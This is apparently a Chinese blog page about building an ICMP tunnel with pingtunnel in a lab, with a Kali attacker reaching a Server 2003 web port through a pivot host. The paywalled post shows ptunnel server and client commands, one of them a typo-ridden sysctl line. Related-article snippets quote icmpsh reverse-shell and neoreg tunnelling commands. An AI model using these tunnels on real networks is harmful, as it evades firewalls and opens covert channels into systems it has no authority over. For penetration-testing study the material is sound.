ICMP 隧道技术 - pingtunnel

最新推荐文章于 2025-10-18 09:18:30 发布

原创

最新推荐文章于 2025-10-18 09:18:30 发布 · 465 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#学习

实验 1

kali 自带 pingtunnel 工具，虽然是旧版本，但也能完成实验。

实验的网络拓扑图：

kali 2021 攻击机无法直接访问 server 2003 的 80 端口 web 网站，但可以访问 kali 2020 跳板机。

我们的目的：将流量转发给跳板机，再通过跳转机转发给 server 2003，返回的流量同样经过跳板机，转发给攻击机，以达到在攻击机可以像访问本地网站一样访问 server 2003 网站的效果。

先在 kali 2020（跳板机）运行 ptunnel 服务端：

ptunnel -x whoami

-x 表示连接的口令。进入监听状态：

然后在 kali 2021（攻击机）连接服务端：

# 关闭 icmp 应答程序，避免对建立的 icmp 隧道造成干扰（可能出现不断跳屏的情况）
sysctl -w sysctl -w net.ipv4.icmp_echo_ingore_all=1
# 连接
ptunnel -p 192.168.0.110 -lp 1080 -da 192.168.1.200 -dp 80 -x whoami

参数说明：

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

friEnd`

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

隐秘通信-使用PingTunnel搭建ICMP隧道实验

帮助别人等于帮助自己 ——MXi4oyu

08-09

1442

Internet Control Message Protocol Internet控制报文协议，简称ICMP协议。它是TCP/IP协议簇的一个子协议，用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据，但是对于用户数据的传递起着重要的作用。CMP协议主要提供两种功能，一种是差错报文，一种是信息类报文。信息类报文包括回显请求和回显应答，以及路由器通告和路由器请求。

隧道工具Pingtunnel使用ICMP协议搭建隧道（附搭建环境超详细）

qq_45300786的博客

12-10

1万+

0x00 前言 ICMP隧道简单实用，是一个比较特殊的协议。在一般的通信协议里，如果两台设备要进行通信，肯定需要开放端口，而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议，攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下，每个ping命令都有相应的回复与请求。在一些网络环境中，如果攻击者使用各类上层隧道(例如：HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了，常常会通过ping命令访问远程计算机，尝试建立ICMP隧道，将TCP/UDP数据封装到ICM

参与评论您还未登录，请先登录后发表或查看评论

【Pingtunnel工具教程】利用ICMP隧道技术进行ICMP封装穿透防火墙

07-19

4721

在一些网络环境中，如果不经过认证，TCP和UDP数据包都会被拦截。如果用户可以ping通远程计算机，就可以尝试建立ICMP隧道，将TCP数据通过该隧道发送，实现不受限的网络访问。用户需要在受限制网络之外，预先启动该工具建立代理服务器。再以客户端模式运行该工具，就可以建立ICMP隧道。为了避免该隧道被滥用，用户还可以为隧道设置使用密码。内网渗透，渗透测试，内网隧道技术。......

ICMP 隧道技术解析&流量特征

尘玥的故事

03-02

1297

进行隐蔽传输的时候，肉鸡(防火墙内部)运行并接受外部攻击端的ICMP_ECHO数据包，攻击端把需要执行的命令隐藏在ICMP_ECHO数据包中，肉鸡接收到该数据包，解出其中隐藏的命令，并在防火墙内部主机上执行，再把执行结果隐藏在ICMP_ECHOREPLY数据包中，发送给外部攻击端。通常ICMP隧道技术采用ICMP的ICMP_ECHO和ICMP_ECHOREPLY两种报文，把数据隐藏在ICMP数据包包头的选项域中，利用ping命令建立隐蔽通道。而正常的icmp数据包里，请求和回应部分数据是一致的。

穿越防火墙的隐形通道：ICMP隧道技术深度解析

最新发布

Bruce_xiaowei的博客

10-18

735

本文深入解析了ICMP隧道技术的原理与应用。文章首先揭示了ICMP协议被忽视的隐蔽通信潜力，详细介绍了icmpsh工具的客户端-服务器架构及其对ICMP数据包的改造方式。随后提供了环境搭建的技术细节，包括ICMP流量控制、网络适应性调整等。重点剖析了通信会话建立过程、高级使用技巧及检测对抗策略，包括异常流量识别特征和企业级防护方案。最后探讨了技术演进趋势、实际应用场景及伦理合规问题，强调该技术既是攻击手段，也是对安全防御体系的压力测试。文章指出，理解此类技术有助于构建更全面的防御体系，推动安全技术创新。

icmp （http） 隧道技术

Yatere的天平秤

04-18

3639

实验环境如下：服务器IP:61.183.254.254 客户机IP:192.168.1.105 Http代理服务器:202.103.24.68 端口：8080 现象：客户机可以ping得通外网服务器，但是却无法上网，出口过滤tcp和udp。目的：客户机可以正常上网。服务器： C:\>ptunnel.exe -v 4 -c "\Device\NPF_{

icmp隧道搭建（pingtunnel的使用）

dzqxwzoe的博客

08-09

1231

第一种是报网络安全专业，现在叫网络空间安全专业，主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习，多媒体技术，信息检索、舆情分析等。第二种是自学，就是在网上找资源、找教程，或者是想办法认识一-些大佬，抱紧大腿，不过这种方法很耗时间，而且学习没有规划，可能很长一段时间感觉自己没有进步，容易劝退。随手输了个root root检测，没想到真的是（靶场嘛，比较简单，大家勿喷哈~）

内网渗透——ICMP隧道搭建

m0_65544268的博客

07-11

745

防火墙限制了TCP数据包的出入站，在这样的背景下，我们可以将TCP的数据包伪装成ICMP、DNS、SMB的数据包。

【渗透测试笔记】之【内网渗透——网络层隧道（icmpsh、PingTunnel的使用：icmp隧道反向shell

2401_84971057的博客

05-13

319

python icmpsh_m.py 192.168.8.35（攻击者IP） 192.168.8.18（受害者IP）icmpsh.exe -t 192.168.8.35（攻击者IP） -d 500 -b 30 -s 128。-s：字节最大数据缓冲区大小（以字节为单位）-t：攻击者IP，必选。-d：请求延迟（毫秒）-o：响应超时（毫秒）方式二：官网下载安装。

ICMP隐藏通信隧道技术

lonmar的博客

08-04

2643

文章目录简介icmpshPingTunnel实验一实验二Icmptunnel 简介 ICMP隧道简单实用,是一个比较特殊的协议.在一般的通信里,两台主机要进行通信必须开放端口.而ICMP协议就不需要. 最常见的ICMP协议就是ping命令的回复常见的ICMP隧道工具有icmpsh,PingTunnel,icmptunnel,powershell icmp等 ICMP隧道搭建条件: 目标主机必须支持ICMP协议的进出探测ICMP协议是否支持: 目标主机与攻击主机能够相互PING通即可 icmpsh i

icmp隧道

热门推荐

03-16

1万+

ICMP 隧道原理 icmp报文中除了必须要有的类型、校验和等等还可以携带一定长度的可选数据，这也就是我们可以用来搭建隧道的原因，不过每次报文携带得的字节不会很多，所以有点慢。 icmpsh icmpsh是一款使用简单，而且不需要管理员权限即可运行的程序，可以较为简答的搭建隧道并同时获得目标shell 攻击机是kali, IP地址：192.168.220.129 下载icmpsh 到本地 git clone https://github.com/inquisb/icmpsh.git #下载工具 apt-

pingtunnel:ICMP流量伪装转发工具 ping tunnel is a tool that advertises tcpudpsocks5 traffic as icmp traffic for forwarding

04-28

Pingtunnel pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具注意：本工具只是用作学习研究，请勿用于非法用途！！！使用安装服务端首先准备好一个具有公网 ip 的服务器，假定域名或者公网 ip 是www.yourserver.com 从下载对应的安装包，如 pingtunnel_linux64.zip，然后解压，以root权限执行 sudo wget (最新release的下载链接) sudo unzip pingtunnel_linux64.zip sudo ./pingtunnel -type server (可选)关闭系统默认的 ping echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all 安装 GUI 客户端(新手推荐) 从下载 qt 的 gui 版本双击 exe 运行，修改

HTTP-DNS-ICMP代理隧道

dscn123的博客

07-03

877

kail虚拟机：桥接模式，（IP地址：192.168.1.5），主要用作外围机 win10虚拟机：桥接模式（IP地址：192.168.1.6）nat模式（IP地址：192.168.126.138）其主要用作边界服务器 windows server：nat模式（IP地址：192.168.126.131）其主要做内网服务器。python3 neoreg.py -k passwd -u http://XX.XX.XX.XX:XX/脚本下载的地址/tunnel.jsp。#secret等于的值为开启服务生成的值。

内网安全：隧道技术详解

Innocence_0的博客

03-08

1070

Block）协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发，用于在局域网中的计算机之间共享文件和资源，445端口运行打印机共享：SMB协议支持打印机的共享，允许用户在网络中使用共享打印机进行打印操作。通过SMB协议，用户可以连接到其他计算机上的共享打印机，并发送打印任务进行打印。文件共享：SMB协议允许计算机之间共享文件和目录。通过SMB协议，用户可以在网络中访问其他计算机上的共享文件夹，并进行文件的读取、写入和管理操作。

PingTunnel建立ICMP隧道

大方子

01-29

5054

介绍 Kali：192.168.61.145 WEB（Debian）：192.168.61.151 win2008：192.168.61.154 假设我们Kali无法直接连接到win2008的3389端口，需要把WEB服务器作为跳板，再连接到win2008的3389端口实验过程我们需要现在Kali和WEB服务器上安装PingTunnel PingTunnel下载地址：http://freshmeat.sourceforge.net/projects/ptunnel/ 以下是在Kali演示安装过程解压并

icmp端口_pingtunnel搭建icmp隧道

weixin_39793420的博客

11-24

493

说明pingtunnel可以将udp、tcp、sock5流量伪装成icmp传输，地址：https://github.com/esrrhs/pingtunnel/，详细说明和用法可参考官方说明。示例图客户端运行在攻击机，服务端运行在受害机。情况如下：通过pingtunnel搭建一个vps到目标web服务器的隧道，然后利用这个隧道去访问内网的其他机器。(PS：本地搭建虚拟机来模拟现实环境)过...

ICMP隧道之PingTunnel利用

Zlirving_的博客

02-13

1719

目录ICMP隧道PingTunnel环境配置实验利用查看流量包总结 ICMP隧道 icmp隧道简单、实用，是一个比较特殊的协议。在一般的通信协议里，如果两台设备进行通信肯定需要开放端口，而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复，攻击者可以利用命令行得到比回复更多的icmp请求。利用价值，在利用 ping 穿透防火墙的检测，因为通常防火墙是不会屏蔽 ping 数据包的。 PingTunnel 用于通过ICMP回显请求和答复数据包（通常称为ping请求和答复）可靠地建立TCP连接的

PingTunnel隧道搭建

weixin_45007073的博客

04-10

2042

概述 PingTunnel也是一款ICMP隧道建立工具，但是它和icmpsh不同的是，pingtunnel工具能够设置隧道密码，避免隧道被其他同行利用。此次实验我们使用一台VPS服务器(kali攻击机)去攻击一台Windows Server2008主机，然后我们利用被突破的一台linux边界服务器为跳板机，建立一条隧道，最后我们的攻击者使用win7来连接我们的VPS攻击机。隧道搭建准备首先我们在VPS攻击机上安装PingTunnel这款工具，因为我使用的是新版的Kali机，所以只需要解决一个依赖问题即可

DNS与ICMP隧道技术文档资料大全

ICMP（Internet Control Message Protocol，互联网控制消息协议）隧道技术利用ICMP协议的数据包在受限网络间建立通信渠道。不同于DNS隧道，ICMP通常用于发送错误消息和操作信息，但通过特定的封装技术，它也可以用于...